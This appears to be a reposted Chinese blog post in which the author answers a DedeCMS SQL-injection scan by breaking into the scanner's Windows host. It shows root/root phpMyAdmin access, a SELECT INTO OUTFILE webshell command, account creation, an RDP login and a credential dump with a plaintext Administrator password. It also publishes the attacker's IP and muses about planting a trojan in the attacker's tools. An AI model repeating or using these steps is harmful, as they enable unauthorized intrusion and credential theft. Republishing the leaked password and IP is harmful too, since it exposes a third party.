清晨起來打開窗,心情美美噠~~
然後就看見IDS報警了。。。報文如下:
標準的DEDECMS SQL注入EXP。以前對這種掃描都是忽略不見(公司網站JAVA系列),今天心血來潮,反日一下,看看是誰在作妖。
一、nmap掃描IP,開了80,訪問一下得到UPUPW的站點。
得到網站根目錄:C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs。 順手mysql密碼試一下~ root root ~
二、UPUPW默認的phpmyadmin路徑為pmd。root權限進入後,直接寫入webshell。
select "" into outfile "C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs/main.php";
還好順利執行,並沒有逼得我用UDF 或者log文件來寫出shell~
三、連上shell,執行添加用戶命令。
小黑看來比較疏忽安全,一點點防備都沒有~~~
四、3389登錄進入,dump下密碼擴大化點戰果。
Authentication Id:0;823353088
Authentication Package:NTLM
Primary User:admin
Authentication Domain:SEO-DICK-1
* User: admin
* Domain: SEO-DICK-1
* Password: 強勢打碼
Authentication Id:0;405599992
Authentication Package:NTLM
Primary User:angge$
Authentication Domain:SEO-DICK-1
* User: angge$
* Domain: SEO-DICK-1
* Password: 強勢打碼
Authentication Id:0;714996
Authentication Package:NTLM
Primary User:Administrator
Authentication Domain:SEO-DICK-1
* User: Administrator
* Domain: SEO-DICK-1
* Password: SEOdick007!@#123
這裡發現一個隱藏用戶angge,貌似是前人已經日過~從Administrator密碼來看,大黑闊應該是做黑帽SEO的。
五、看看黑闊在幹嘛。
批量掃描腳本-.- 比較簡陋。
順手收割小黑的果實。
六、T掉Administrator用戶,開啟WIN安全登錄事件,抓下黑闊登錄IP。
180.232.122.202 菲律賓普通寬帶用戶,馬尼拉 馬卡蒂。看來大黑闊可能肉身已經翻牆了。
七、更多攻擊暢想
替換Administrator用戶掃描的程序,套個木馬進去,等待大黑闊本地執行。大黑闊也可能帶著本地磁盤連接主機,這時候也可以訪問他本地磁盤替換木馬程序。
沒再做更多測試,打完收工了。本人比較厭惡這些瞎JB一直掃的批量工具,搞的我IDS天天報警不斷,主機上的工具就不發了。
閱讀更多 信息安全搬運工 的文章
關鍵字: 根目錄 phpMyAdmin 編程語言